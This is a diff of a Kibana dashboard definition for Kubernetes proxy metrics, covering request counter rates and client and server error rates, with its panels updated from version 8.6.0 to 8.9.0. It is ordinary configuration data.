- "description": "", - "references": [ - { - "id": "metrics-*", - "name": "indexpattern-datasource-layer-7c7c4b67-a2df-427f-abbd-635e5fa73a9c", - "type": "index-pattern" - } - ], - "state": { - "adHocDataViews": {}, - "datasourceStates": { - "formBased": { - "layers": { - "7c7c4b67-a2df-427f-abbd-635e5fa73a9c": { - "columnOrder": [ - "d3b90051-0bb2-41e0-9d5d-34ff145dba09", - "8a2e9cea-60fb-4603-a072-9b0e6194344c", - "63268365-bb35-456f-831c-78238984a061", - "63268365-bb35-456f-831c-78238984a061X0", - "63268365-bb35-456f-831c-78238984a061X1" - ], - "columns": { - "63268365-bb35-456f-831c-78238984a061": { - "customLabel": true, - "dataType": "number", - "isBucketed": false, - "label": "Requests", - "operationType": "formula", - "params": { - "format": { - "id": "number", - "params": { - "decimals": 2 - } - }, - "formula": "counter_rate(last_value(kubernetes.proxy.client.request.count))", - "isFormulaBroken": false - }, - "references": [ - "63268365-bb35-456f-831c-78238984a061X1" - ], - "scale": "ratio", - "timeScale": "s" 
- }, - "63268365-bb35-456f-831c-78238984a061X0": { - "customLabel": true, - "dataType": "number", - "filter": { - "language": "kuery", - "query": "kubernetes.proxy.client.request.count: *" - }, - "isBucketed": false, - "label": "Part of Requests", - "operationType": "last_value", - "params": { - "sortField": "@timestamp" - }, - "scale": "ratio", - "sourceField": "kubernetes.proxy.client.request.count" - }, - "63268365-bb35-456f-831c-78238984a061X1": { - "customLabel": true, - "dataType": "number", - "isBucketed": false, - "label": "Part of Requests", - "operationType": "counter_rate", - "references": [ - "63268365-bb35-456f-831c-78238984a061X0" - ], - "scale": "ratio", - "timeScale": "s" - }, - "8a2e9cea-60fb-4603-a072-9b0e6194344c": { - "dataType": "date", - "isBucketed": true, - "label": "@timestamp", - "operationType": "date_histogram", - "params": { - "dropPartials": true, - "includeEmptyRows": true, - "interval": "10s" - }, - "scale": "interval", - "sourceField": "@timestamp" - }, - "d3b90051-0bb2-41e0-9d5d-34ff145dba09": { - "dataType": "string", - "isBucketed": true, - "label": "Top 10 values of host.name", - "operationType": "terms", - "params": { - "missingBucket": false, - "orderAgg": { - "customLabel": false, - "dataType": "number", - "isBucketed": false, - "label": "Count of records", - "operationType": "count", - "params": { - "emptyAsNull": true - }, - "scale": "ratio", - "sourceField": "___records___" - }, - "orderBy": { - "type": "custom" - }, - "orderDirection": "desc", - "otherBucket": false, - "parentFormat": { - "id": "multi_terms" - }, - "secondaryFields": [ - "kubernetes.proxy.code", - "kubernetes.proxy.method" - ], - "size": 10 - }, - "scale": "ordinal", - "sourceField": "host.name" - } - }, - "incompleteColumns": {} - } - } - } - }, - "filters": [], - "internalReferences": [], - "query": { - "language": "kuery", - "query": "" + "title": "", + "type": "lens", + "visualizationType": "lnsXY" + }, + "enhancements": {}, + "hidePanelTitles": 
false, + "type": "lens" + }, + "title": "Average request latency" + }, + { + "version": "8.9.0", + "type": "lens", + "gridData": { + "h": 14, + "i": "91a7ce56-6a49-4b7e-837f-31c184b48c09", + "w": 24, + "x": 24, + "y": 52 + }, + "panelIndex": "91a7ce56-6a49-4b7e-837f-31c184b48c09", + "embeddableConfig": { + "attributes": { + "description": "", + "references": [ + { + "id": "metrics-*", + "name": "indexpattern-datasource-layer-7c7c4b67-a2df-427f-abbd-635e5fa73a9c", + "type": "index-pattern" + } + ], + "state": { + "adHocDataViews": {}, + "datasourceStates": { + "formBased": { + "layers": { + "7c7c4b67-a2df-427f-abbd-635e5fa73a9c": { + "columnOrder": [ + "d3b90051-0bb2-41e0-9d5d-34ff145dba09", + "8a2e9cea-60fb-4603-a072-9b0e6194344c", + "63268365-bb35-456f-831c-78238984a061", + "63268365-bb35-456f-831c-78238984a061X0", + "63268365-bb35-456f-831c-78238984a061X1" + ], + "columns": { + "63268365-bb35-456f-831c-78238984a061": { + "customLabel": true, + "dataType": "number", + "isBucketed": false, + "label": "Requests", + "operationType": "formula", + "params": { + "format": { + "id": "number", + "params": { + "decimals": 2 + } }, - "visualization": { - "axisTitlesVisibilitySettings": { - "x": false, - "yLeft": false, - "yRight": true - }, - "layers": [ - { - "accessors": [ - "63268365-bb35-456f-831c-78238984a061" - ], - "layerId": "7c7c4b67-a2df-427f-abbd-635e5fa73a9c", - "layerType": "data", - "palette": { - "name": "default", - "type": "palette" - }, - "position": "top", - "seriesType": "line", - "showGridlines": false, - "splitAccessor": "d3b90051-0bb2-41e0-9d5d-34ff145dba09", - "xAccessor": "8a2e9cea-60fb-4603-a072-9b0e6194344c" - } - ], - "legend": { - "isVisible": true, - "legendSize": "large", - "position": "right", - "shouldTruncate": false - }, - "preferredSeriesType": "bar_stacked", - "title": "Empty XY chart", - "valueLabels": "hide", - "xTitle": "", - "yTitle": "" - } + "formula": "counter_rate(last_value(kubernetes.proxy.client.request.count))", + 
"isFormulaBroken": false + }, + "references": [ + "63268365-bb35-456f-831c-78238984a061X1" + ], + "scale": "ratio", + "timeScale": "s" }, - "title": "", - "type": "lens", - "visualizationType": "lnsXY" - }, - "enhancements": {}, - "hidePanelTitles": false + "63268365-bb35-456f-831c-78238984a061X0": { + "customLabel": true, + "dataType": "number", + "filter": { + "language": "kuery", + "query": "kubernetes.proxy.client.request.count: *" + }, + "isBucketed": false, + "label": "Part of Requests", + "operationType": "last_value", + "params": { + "sortField": "@timestamp" + }, + "scale": "ratio", + "sourceField": "kubernetes.proxy.client.request.count" + }, + "63268365-bb35-456f-831c-78238984a061X1": { + "customLabel": true, + "dataType": "number", + "isBucketed": false, + "label": "Part of Requests", + "operationType": "counter_rate", + "references": [ + "63268365-bb35-456f-831c-78238984a061X0" + ], + "scale": "ratio", + "timeScale": "s" + }, + "8a2e9cea-60fb-4603-a072-9b0e6194344c": { + "dataType": "date", + "isBucketed": true, + "label": "@timestamp", + "operationType": "date_histogram", + "params": { + "dropPartials": true, + "includeEmptyRows": true, + "interval": "10s" + }, + "scale": "interval", + "sourceField": "@timestamp" + }, + "d3b90051-0bb2-41e0-9d5d-34ff145dba09": { + "dataType": "string", + "isBucketed": true, + "label": "Top 10 values of host.name", + "operationType": "terms", + "params": { + "missingBucket": false, + "orderAgg": { + "customLabel": false, + "dataType": "number", + "isBucketed": false, + "label": "Count of records", + "operationType": "count", + "params": { + "emptyAsNull": true + }, + "scale": "ratio", + "sourceField": "___records___" + }, + "orderBy": { + "type": "custom" + }, + "orderDirection": "desc", + "otherBucket": false, + "parentFormat": { + "id": "multi_terms" + }, + "secondaryFields": [ + "kubernetes.proxy.code", + "kubernetes.proxy.method" + ], + "size": 10 + }, + "scale": "ordinal", + "sourceField": "host.name" + } + }, + 
"incompleteColumns": {} + } + } + } + }, + "filters": [], + "internalReferences": [], + "query": { + "language": "kuery", + "query": "" + }, + "visualization": { + "axisTitlesVisibilitySettings": { + "x": false, + "yLeft": false, + "yRight": true }, - "gridData": { - "h": 14, - "i": "91a7ce56-6a49-4b7e-837f-31c184b48c09", - "w": 24, - "x": 24, - "y": 52 + "layers": [ + { + "accessors": [ + "63268365-bb35-456f-831c-78238984a061" + ], + "layerId": "7c7c4b67-a2df-427f-abbd-635e5fa73a9c", + "layerType": "data", + "palette": { + "name": "default", + "type": "palette" + }, + "position": "top", + "seriesType": "line", + "showGridlines": false, + "splitAccessor": "d3b90051-0bb2-41e0-9d5d-34ff145dba09", + "xAccessor": "8a2e9cea-60fb-4603-a072-9b0e6194344c" + } + ], + "legend": { + "isVisible": true, + "legendSize": "large", + "position": "right", + "shouldTruncate": false }, - "panelIndex": "91a7ce56-6a49-4b7e-837f-31c184b48c09", - "title": "Requests counter rate", - "type": "lens", - "version": "8.6.0" + "preferredSeriesType": "bar_stacked", + "title": "Empty XY chart", + "valueLabels": "hide", + "xTitle": "", + "yTitle": "" + } }, - { - "embeddableConfig": { - "attributes": { - "references": [ - { - "id": "metrics-*", - "name": "indexpattern-datasource-layer-acbb7181-0ff2-4164-9761-8b2c430d6a68", - "type": "index-pattern" - } - ], - "state": { - "adHocDataViews": {}, - "datasourceStates": { - "formBased": { - "layers": { - "acbb7181-0ff2-4164-9761-8b2c430d6a68": { - "columnOrder": [ - "eb84dd5b-79c5-4928-8636-fcc56d70b7fc", - "a42b9c5d-612b-4849-be9e-2405c3ad6e28", - "fea759f8-df7f-4c51-8163-03ed7c9e1a8f", - "eb7e83d0-db8e-4b46-963c-3f2e8f343546", - "2a6c7891-abb8-467d-ba48-e1807a096b9c", - "fea759f8-df7f-4c51-8163-03ed7c9e1a8fX1", - "fea759f8-df7f-4c51-8163-03ed7c9e1a8fX0" - ], - "columns": { - "2a6c7891-abb8-467d-ba48-e1807a096b9c": { - "customLabel": true, - "dataType": "number", - "isBucketed": false, - "label": "", - "operationType": "differences", - "references": [ 
- "eb7e83d0-db8e-4b46-963c-3f2e8f343546" - ], - "scale": "ratio" - }, - "a42b9c5d-612b-4849-be9e-2405c3ad6e28": { - "dataType": "date", - "isBucketed": true, - "label": "@timestamp", - "operationType": "date_histogram", - "params": { - "dropPartials": true, - "includeEmptyRows": true, - "interval": "auto", - "sortField": "@timestamp" - }, - "scale": "interval", - "sourceField": "@timestamp" - }, - "eb7e83d0-db8e-4b46-963c-3f2e8f343546": { - "customLabel": true, - "dataType": "number", - "isBucketed": false, - "label": "Part of differences(max(kubernetes.proxy.client.request.count))", - "operationType": "max", - "params": { - "emptyAsNull": false, - "sortField": "@timestamp" - }, - "scale": "ratio", - "sourceField": "kubernetes.proxy.client.request.count" - }, - "eb84dd5b-79c5-4928-8636-fcc56d70b7fc": { - "dataType": "string", - "isBucketed": true, - "label": "Top 10 values", - "operationType": "terms", - "params": { - "missingBucket": false, - "orderBy": { - "fallback": true, - "type": "alphabetical" - }, - "orderDirection": "asc", - "otherBucket": true, - "parentFormat": { - "id": "multi_terms" - }, - "secondaryFields": [ - "kubernetes.proxy.code", - "kubernetes.proxy.method" - ], - "size": 4 - }, - "scale": "ordinal", - "sourceField": "kubernetes.proxy.host" - }, - "fea759f8-df7f-4c51-8163-03ed7c9e1a8f": { - "customLabel": true, - "dataType": "number", - "filter": { - "language": "kuery", - "query": "" - }, - "isBucketed": false, - "label": "Client errors", - "operationType": "formula", - "params": { - "format": { - "id": "number", - "params": { - "decimals": 2 - } - }, - "formula": "counter_rate(last_value(kubernetes.proxy.client.request.count))", - "isFormulaBroken": false - }, - "references": [ - "fea759f8-df7f-4c51-8163-03ed7c9e1a8fX1" - ], - "scale": "ratio", - "timeScale": "s" - }, - "fea759f8-df7f-4c51-8163-03ed7c9e1a8fX0": { - "customLabel": true, - "dataType": "number", - "filter": { - "language": "kuery", - "query": "" - }, - "isBucketed": false, - 
"label": "Part of Client errors", - "operationType": "last_value", - "params": { - "sortField": "@timestamp" - }, - "scale": "ratio", - "sourceField": "kubernetes.proxy.client.request.count" - }, - "fea759f8-df7f-4c51-8163-03ed7c9e1a8fX1": { - "customLabel": true, - "dataType": "number", - "filter": { - "language": "kuery", - "query": "" - }, - "isBucketed": false, - "label": "Part of Client errors", - "operationType": "counter_rate", - "references": [ - "fea759f8-df7f-4c51-8163-03ed7c9e1a8fX0" - ], - "scale": "ratio", - "timeScale": "s" - } - }, - "incompleteColumns": {} - } - } - } + "title": "", + "type": "lens", + "visualizationType": "lnsXY" + }, + "enhancements": {}, + "hidePanelTitles": false, + "type": "lens" + }, + "title": "Requests counter rate" + }, + { + "version": "8.9.0", + "type": "lens", + "gridData": { + "h": 14, + "i": "24a2f3ce-a762-4e5f-8794-ff67fc70a41d", + "w": 24, + "x": 0, + "y": 66 + }, + "panelIndex": "24a2f3ce-a762-4e5f-8794-ff67fc70a41d", + "embeddableConfig": { + "attributes": { + "references": [ + { + "id": "metrics-*", + "name": "indexpattern-datasource-layer-acbb7181-0ff2-4164-9761-8b2c430d6a68", + "type": "index-pattern" + } + ], + "state": { + "adHocDataViews": {}, + "datasourceStates": { + "formBased": { + "layers": { + "acbb7181-0ff2-4164-9761-8b2c430d6a68": { + "columnOrder": [ + "eb84dd5b-79c5-4928-8636-fcc56d70b7fc", + "a42b9c5d-612b-4849-be9e-2405c3ad6e28", + "fea759f8-df7f-4c51-8163-03ed7c9e1a8f", + "eb7e83d0-db8e-4b46-963c-3f2e8f343546", + "2a6c7891-abb8-467d-ba48-e1807a096b9c", + "fea759f8-df7f-4c51-8163-03ed7c9e1a8fX1", + "fea759f8-df7f-4c51-8163-03ed7c9e1a8fX0" + ], + "columns": { + "2a6c7891-abb8-467d-ba48-e1807a096b9c": { + "customLabel": true, + "dataType": "number", + "isBucketed": false, + "label": "", + "operationType": "differences", + "references": [ + "eb7e83d0-db8e-4b46-963c-3f2e8f343546" + ], + "scale": "ratio" + }, + "a42b9c5d-612b-4849-be9e-2405c3ad6e28": { + "dataType": "date", + "isBucketed": true, + 
"label": "@timestamp", + "operationType": "date_histogram", + "params": { + "dropPartials": true, + "includeEmptyRows": true, + "interval": "auto", + "sortField": "@timestamp" + }, + "scale": "interval", + "sourceField": "@timestamp" + }, + "eb7e83d0-db8e-4b46-963c-3f2e8f343546": { + "customLabel": true, + "dataType": "number", + "isBucketed": false, + "label": "Part of differences(max(kubernetes.proxy.client.request.count))", + "operationType": "max", + "params": { + "emptyAsNull": false, + "sortField": "@timestamp" + }, + "scale": "ratio", + "sourceField": "kubernetes.proxy.client.request.count" + }, + "eb84dd5b-79c5-4928-8636-fcc56d70b7fc": { + "dataType": "string", + "isBucketed": true, + "label": "Top 10 values", + "operationType": "terms", + "params": { + "missingBucket": false, + "orderBy": { + "fallback": true, + "type": "alphabetical" }, - "filters": [ - { - "$state": { - "store": "appState" - }, - "meta": { - "alias": null, - "disabled": false, - "index": "947a681d-0eb3-462e-a2cb-5adade5d6c85", - "key": "query", - "negate": false, - "type": "custom" - }, - "query": { - "range": { - "kubernetes.proxy.code": { - "gte": 400, - "lt": 500 - } - } - } - } + "orderDirection": "asc", + "otherBucket": true, + "parentFormat": { + "id": "multi_terms" + }, + "secondaryFields": [ + "kubernetes.proxy.code", + "kubernetes.proxy.method" ], - "internalReferences": [], - "query": { - "language": "kuery", - "query": "" + "size": 4 + }, + "scale": "ordinal", + "sourceField": "kubernetes.proxy.host" + }, + "fea759f8-df7f-4c51-8163-03ed7c9e1a8f": { + "customLabel": true, + "dataType": "number", + "filter": { + "language": "kuery", + "query": "" + }, + "isBucketed": false, + "label": "Client errors", + "operationType": "formula", + "params": { + "format": { + "id": "number", + "params": { + "decimals": 2 + } }, - "visualization": { - "axisTitlesVisibilitySettings": { - "x": false, - "yLeft": false, - "yRight": true - }, - "layers": [ - { - "accessors": [ - 
"fea759f8-df7f-4c51-8163-03ed7c9e1a8f" - ], - "layerId": "acbb7181-0ff2-4164-9761-8b2c430d6a68", - "layerType": "data", - "palette": { - "name": "default", - "type": "palette" - }, - "position": "top", - "seriesType": "line", - "showGridlines": false, - "splitAccessor": "eb84dd5b-79c5-4928-8636-fcc56d70b7fc", - "xAccessor": "a42b9c5d-612b-4849-be9e-2405c3ad6e28" - } - ], - "legend": { - "isVisible": true, - "legendSize": "large", - "position": "right", - "shouldTruncate": false - }, - "preferredSeriesType": "bar_stacked", - "title": "Empty XY chart", - "valueLabels": "hide", - "xTitle": "", - "yTitle": "" - } + "formula": "counter_rate(last_value(kubernetes.proxy.client.request.count))", + "isFormulaBroken": false + }, + "references": [ + "fea759f8-df7f-4c51-8163-03ed7c9e1a8fX1" + ], + "scale": "ratio", + "timeScale": "s" }, - "title": "", - "type": "lens", - "visualizationType": "lnsXY" - }, - "enhancements": {}, - "hidePanelTitles": false + "fea759f8-df7f-4c51-8163-03ed7c9e1a8fX0": { + "customLabel": true, + "dataType": "number", + "filter": { + "language": "kuery", + "query": "" + }, + "isBucketed": false, + "label": "Part of Client errors", + "operationType": "last_value", + "params": { + "sortField": "@timestamp" + }, + "scale": "ratio", + "sourceField": "kubernetes.proxy.client.request.count" + }, + "fea759f8-df7f-4c51-8163-03ed7c9e1a8fX1": { + "customLabel": true, + "dataType": "number", + "filter": { + "language": "kuery", + "query": "" + }, + "isBucketed": false, + "label": "Part of Client errors", + "operationType": "counter_rate", + "references": [ + "fea759f8-df7f-4c51-8163-03ed7c9e1a8fX0" + ], + "scale": "ratio", + "timeScale": "s" + } + }, + "incompleteColumns": {} + } + } + } + }, + "filters": [ + { + "$state": { + "store": "appState" + }, + "meta": { + "alias": null, + "disabled": false, + "index": "947a681d-0eb3-462e-a2cb-5adade5d6c85", + "key": "query", + "negate": false, + "type": "custom" + }, + "query": { + "range": { + "kubernetes.proxy.code": 
{ + "gte": 400, + "lt": 500 + } + } + } + } + ], + "internalReferences": [], + "query": { + "language": "kuery", + "query": "" + }, + "visualization": { + "axisTitlesVisibilitySettings": { + "x": false, + "yLeft": false, + "yRight": true }, - "gridData": { - "h": 14, - "i": "24a2f3ce-a762-4e5f-8794-ff67fc70a41d", - "w": 24, - "x": 0, - "y": 66 + "layers": [ + { + "accessors": [ + "fea759f8-df7f-4c51-8163-03ed7c9e1a8f" + ], + "layerId": "acbb7181-0ff2-4164-9761-8b2c430d6a68", + "layerType": "data", + "palette": { + "name": "default", + "type": "palette" + }, + "position": "top", + "seriesType": "line", + "showGridlines": false, + "splitAccessor": "eb84dd5b-79c5-4928-8636-fcc56d70b7fc", + "xAccessor": "a42b9c5d-612b-4849-be9e-2405c3ad6e28" + } + ], + "legend": { + "isVisible": true, + "legendSize": "large", + "position": "right", + "shouldTruncate": false }, - "panelIndex": "24a2f3ce-a762-4e5f-8794-ff67fc70a41d", - "title": "Client error responses counter rate", - "type": "lens", - "version": "8.6.0" + "preferredSeriesType": "bar_stacked", + "title": "Empty XY chart", + "valueLabels": "hide", + "xTitle": "", + "yTitle": "" + } }, - { - "embeddableConfig": { - "attributes": { - "description": "", - "references": [ - { - "id": "metrics-*", - "name": "indexpattern-datasource-layer-54af7a75-9eab-4746-b959-378d6bbb7cf6", - "type": "index-pattern" - } - ], - "state": { - "adHocDataViews": {}, - "datasourceStates": { - "formBased": { - "layers": { - "54af7a75-9eab-4746-b959-378d6bbb7cf6": { - "columnOrder": [ - "e05814a2-da30-432b-8fbf-bad34214cc4c", - "2a39c430-b798-486a-8ad6-f91c4fb96fc8", - "ffd0dce8-3168-40cd-9ec3-46d5003d9093", - "e137ff3f-86e1-4be8-9bee-a9f50d5cbec8", - "63166add-64d0-4f67-b9cf-e0a4fee229a4", - "f19c32fc-8086-4c14-a124-747572608ae5", - "b842fba2-3cc2-4d13-8cf9-37b66f21b796", - "ffd0dce8-3168-40cd-9ec3-46d5003d9093X1", - "ffd0dce8-3168-40cd-9ec3-46d5003d9093X0" - ], - "columns": { - "2a39c430-b798-486a-8ad6-f91c4fb96fc8": { - "dataType": "date", - 
"isBucketed": true, - "label": "@timestamp", - "operationType": "date_histogram", - "params": { - "dropPartials": false, - "includeEmptyRows": true, - "interval": "auto" - }, - "scale": "interval", - "sourceField": "@timestamp" - }, - "63166add-64d0-4f67-b9cf-e0a4fee229a4": { - "customLabel": true, - "dataType": "number", - "isBucketed": false, - "label": "", - "operationType": "differences", - "references": [ - "e137ff3f-86e1-4be8-9bee-a9f50d5cbec8" - ], - "scale": "ratio" - }, - "b842fba2-3cc2-4d13-8cf9-37b66f21b796": { - "customLabel": true, - "dataType": "number", - "filter": {}, - "isBucketed": false, - "label": "", - "operationType": "max", - "params": { - "emptyAsNull": false - }, - "scale": "ratio", - "sourceField": "kubernetes.proxy.client.request.count" - }, - "e05814a2-da30-432b-8fbf-bad34214cc4c": { - "dataType": "string", - "isBucketed": true, - "label": "Top values", - "operationType": "terms", - "params": { - "missingBucket": false, - "orderBy": { - "fallback": true, - "type": "alphabetical" - }, - "orderDirection": "asc", - "otherBucket": true, - "parentFormat": { - "id": "multi_terms" - }, - "secondaryFields": [ - "kubernetes.proxy.code", - "kubernetes.proxy.method" - ], - "size": 4 - }, - "scale": "ordinal", - "sourceField": "kubernetes.proxy.host" - }, - "e137ff3f-86e1-4be8-9bee-a9f50d5cbec8": { - "customLabel": true, - "dataType": "number", - "isBucketed": false, - "label": "", - "operationType": "max", - "params": { - "emptyAsNull": false - }, - "scale": "ratio", - "sourceField": "kubernetes.proxy.client.request.count" - }, - "f19c32fc-8086-4c14-a124-747572608ae5": { - "customLabel": true, - "dataType": "number", - "filter": {}, - "isBucketed": false, - "label": "", - "operationType": "differences", - "references": [ - "b842fba2-3cc2-4d13-8cf9-37b66f21b796" - ], - "scale": "ratio" - }, - "ffd0dce8-3168-40cd-9ec3-46d5003d9093": { - "customLabel": true, - "dataType": "number", - "filter": {}, - "isBucketed": false, - "label": "Server errors", - 
"operationType": "formula", - "params": { - "format": { - "id": "number", - "params": { - "decimals": 2 - } - }, - "formula": "counter_rate(last_value(kubernetes.proxy.client.request.count))", - "isFormulaBroken": false - }, - "references": [ - "ffd0dce8-3168-40cd-9ec3-46d5003d9093X1" - ], - "scale": "ratio", - "timeScale": "s" - }, - "ffd0dce8-3168-40cd-9ec3-46d5003d9093X0": { - "customLabel": true, - "dataType": "number", - "filter": { - "language": "kuery", - "query": "kubernetes.proxy.client.request.count: *" - }, - "isBucketed": false, - "label": "Part of Server errors", - "operationType": "last_value", - "params": { - "sortField": "@timestamp" - }, - "scale": "ratio", - "sourceField": "kubernetes.proxy.client.request.count" - }, - "ffd0dce8-3168-40cd-9ec3-46d5003d9093X1": { - "customLabel": true, - "dataType": "number", - "isBucketed": false, - "label": "Part of Server errors", - "operationType": "counter_rate", - "references": [ - "ffd0dce8-3168-40cd-9ec3-46d5003d9093X0" - ], - "scale": "ratio", - "timeScale": "s" - } - }, - "incompleteColumns": {} - } - } - } + "title": "", + "type": "lens", + "visualizationType": "lnsXY" + }, + "enhancements": {}, + "hidePanelTitles": false, + "type": "lens" + }, + "title": "Client error responses counter rate" + }, + { + "version": "8.9.0", + "type": "lens", + "gridData": { + "h": 14, + "i": "e3c408a3-6515-4104-b764-888f39fa6185", + "w": 24, + "x": 24, + "y": 66 + }, + "panelIndex": "e3c408a3-6515-4104-b764-888f39fa6185", + "embeddableConfig": { + "attributes": { + "description": "", + "references": [ + { + "id": "metrics-*", + "name": "indexpattern-datasource-layer-54af7a75-9eab-4746-b959-378d6bbb7cf6", + "type": "index-pattern" + } + ], + "state": { + "adHocDataViews": {}, + "datasourceStates": { + "formBased": { + "layers": { + "54af7a75-9eab-4746-b959-378d6bbb7cf6": { + "columnOrder": [ + "e05814a2-da30-432b-8fbf-bad34214cc4c", + "2a39c430-b798-486a-8ad6-f91c4fb96fc8", + "ffd0dce8-3168-40cd-9ec3-46d5003d9093", + 
"e137ff3f-86e1-4be8-9bee-a9f50d5cbec8", + "63166add-64d0-4f67-b9cf-e0a4fee229a4", + "f19c32fc-8086-4c14-a124-747572608ae5", + "b842fba2-3cc2-4d13-8cf9-37b66f21b796", + "ffd0dce8-3168-40cd-9ec3-46d5003d9093X1", + "ffd0dce8-3168-40cd-9ec3-46d5003d9093X0" + ], + "columns": { + "2a39c430-b798-486a-8ad6-f91c4fb96fc8": { + "dataType": "date", + "isBucketed": true, + "label": "@timestamp", + "operationType": "date_histogram", + "params": { + "dropPartials": false, + "includeEmptyRows": true, + "interval": "auto" + }, + "scale": "interval", + "sourceField": "@timestamp" + }, + "63166add-64d0-4f67-b9cf-e0a4fee229a4": { + "customLabel": true, + "dataType": "number", + "isBucketed": false, + "label": "", + "operationType": "differences", + "references": [ + "e137ff3f-86e1-4be8-9bee-a9f50d5cbec8" + ], + "scale": "ratio" + }, + "b842fba2-3cc2-4d13-8cf9-37b66f21b796": { + "customLabel": true, + "dataType": "number", + "filter": {}, + "isBucketed": false, + "label": "", + "operationType": "max", + "params": { + "emptyAsNull": false + }, + "scale": "ratio", + "sourceField": "kubernetes.proxy.client.request.count" + }, + "e05814a2-da30-432b-8fbf-bad34214cc4c": { + "dataType": "string", + "isBucketed": true, + "label": "Top values", + "operationType": "terms", + "params": { + "missingBucket": false, + "orderBy": { + "fallback": true, + "type": "alphabetical" }, - "filters": [ - { - "$state": { - "store": "appState" - }, - "meta": { - "alias": null, - "disabled": false, - "index": "f97a243b-a7a5-4fff-b2c8-7e4231e73f63", - "key": "query", - "negate": false, - "type": "custom" - }, - "query": { - "range": { - "kubernetes.proxy.code": { - "gte": 500 - } - } - } - } + "orderDirection": "asc", + "otherBucket": true, + "parentFormat": { + "id": "multi_terms" + }, + "secondaryFields": [ + "kubernetes.proxy.code", + "kubernetes.proxy.method" ], - "internalReferences": [], - "query": { - "language": "kuery", - "query": "" + "size": 4 + }, + "scale": "ordinal", + "sourceField": 
"kubernetes.proxy.host" + }, + "e137ff3f-86e1-4be8-9bee-a9f50d5cbec8": { + "customLabel": true, + "dataType": "number", + "isBucketed": false, + "label": "", + "operationType": "max", + "params": { + "emptyAsNull": false + }, + "scale": "ratio", + "sourceField": "kubernetes.proxy.client.request.count" + }, + "f19c32fc-8086-4c14-a124-747572608ae5": { + "customLabel": true, + "dataType": "number", + "filter": {}, + "isBucketed": false, + "label": "", + "operationType": "differences", + "references": [ + "b842fba2-3cc2-4d13-8cf9-37b66f21b796" + ], + "scale": "ratio" + }, + "ffd0dce8-3168-40cd-9ec3-46d5003d9093": { + "customLabel": true, + "dataType": "number", + "filter": {}, + "isBucketed": false, + "label": "Server errors", + "operationType": "formula", + "params": { + "format": { + "id": "number", + "params": { + "decimals": 2 + } }, - "visualization": { - "axisTitlesVisibilitySettings": { - "x": false, - "yLeft": false, - "yRight": true - }, - "layers": [ - { - "accessors": [ - "ffd0dce8-3168-40cd-9ec3-46d5003d9093" - ], - "layerId": "54af7a75-9eab-4746-b959-378d6bbb7cf6", - "layerType": "data", - "palette": { - "name": "default", - "type": "palette" - }, - "position": "top", - "seriesType": "line", - "showGridlines": false, - "splitAccessor": "e05814a2-da30-432b-8fbf-bad34214cc4c", - "xAccessor": "2a39c430-b798-486a-8ad6-f91c4fb96fc8" - } - ], - "legend": { - "isVisible": true, - "legendSize": "large", - "position": "right", - "shouldTruncate": false - }, - "preferredSeriesType": "bar_stacked", - "title": "Empty XY chart", - "valueLabels": "hide", - "xTitle": "", - "yTitle": "" - } + "formula": "counter_rate(last_value(kubernetes.proxy.client.request.count))", + "isFormulaBroken": false + }, + "references": [ + "ffd0dce8-3168-40cd-9ec3-46d5003d9093X1" + ], + "scale": "ratio", + "timeScale": "s" }, - "title": "", - "type": "lens", - "visualizationType": "lnsXY" - }, - "enhancements": {}, - "hidePanelTitles": false + "ffd0dce8-3168-40cd-9ec3-46d5003d9093X0": { + 
"customLabel": true, + "dataType": "number", + "filter": { + "language": "kuery", + "query": "kubernetes.proxy.client.request.count: *" + }, + "isBucketed": false, + "label": "Part of Server errors", + "operationType": "last_value", + "params": { + "sortField": "@timestamp" + }, + "scale": "ratio", + "sourceField": "kubernetes.proxy.client.request.count" + }, + "ffd0dce8-3168-40cd-9ec3-46d5003d9093X1": { + "customLabel": true, + "dataType": "number", + "isBucketed": false, + "label": "Part of Server errors", + "operationType": "counter_rate", + "references": [ + "ffd0dce8-3168-40cd-9ec3-46d5003d9093X0" + ], + "scale": "ratio", + "timeScale": "s" + } + }, + "incompleteColumns": {} + } + } + } + }, + "filters": [ + { + "$state": { + "store": "appState" + }, + "meta": { + "alias": null, + "disabled": false, + "index": "f97a243b-a7a5-4fff-b2c8-7e4231e73f63", + "key": "query", + "negate": false, + "type": "custom" + }, + "query": { + "range": { + "kubernetes.proxy.code": { + "gte": 500 + } + } + } + } + ], + "internalReferences": [], + "query": { + "language": "kuery", + "query": "" + }, + "visualization": { + "axisTitlesVisibilitySettings": { + "x": false, + "yLeft": false, + "yRight": true }, - "gridData": { - "h": 14, - "i": "e3c408a3-6515-4104-b764-888f39fa6185", - "w": 24, - "x": 24, - "y": 66 + "layers": [ + { + "accessors": [ + "ffd0dce8-3168-40cd-9ec3-46d5003d9093" + ], + "layerId": "54af7a75-9eab-4746-b959-378d6bbb7cf6", + "layerType": "data", + "palette": { + "name": "default", + "type": "palette" + }, + "position": "top", + "seriesType": "line", + "showGridlines": false, + "splitAccessor": "e05814a2-da30-432b-8fbf-bad34214cc4c", + "xAccessor": "2a39c430-b798-486a-8ad6-f91c4fb96fc8" + } + ], + "legend": { + "isVisible": true, + "legendSize": "large", + "position": "right", + "shouldTruncate": false }, - "panelIndex": "e3c408a3-6515-4104-b764-888f39fa6185", - "title": "Server error responses counter rate", - "type": "lens", - "version": "8.6.0" - } - ], - 
"timeRestore": false, - "title": "[Metrics Kubernetes] Proxy", - "version": 1 - }, - "coreMigrationVersion": "8.6.0", - "created_at": "2023-01-11T16:15:13.706Z", - "id": "kubernetes-5e649d60-9901-11e9-ba57-b7ab4e2d4b58", - "migrationVersion": { - "dashboard": "8.6.0" - }, - "references": [ - { - "id": "metrics-*", - "name": "kibanaSavedObjectMeta.searchSourceJSON.filter[0].meta.index", - "type": "index-pattern" - }, - { - "id": "metrics-*", - "name": "ff6afcdf-0de2-47fb-aa9e-72b48f11e0cd:metrics_ff6afcdf-0de2-47fb-aa9e-72b48f11e0cd_0_index_pattern", - "type": "index-pattern" - }, - { - "id": "metrics-*", - "name": "f74e1a86-4370-4f65-a3b8-d92c9f25ff42:indexpattern-datasource-layer-5de1942f-e0a5-4ed8-86c0-972d57d62085", - "type": "index-pattern" - }, - { - "id": "metrics-*", - "name": "34de2f11-faf2-49e8-aada-98c2cd5eb266:indexpattern-datasource-layer-0b5eadf5-2a9c-49a2-b862-d317822adfd8", - "type": "index-pattern" - }, - { - "id": "metrics-*", - "name": "c3fee68f-01c6-49da-a759-2900b1cd15bf:metrics_c3fee68f-01c6-49da-a759-2900b1cd15bf_0_index_pattern", - "type": "index-pattern" - }, - { - "id": "metrics-*", - "name": 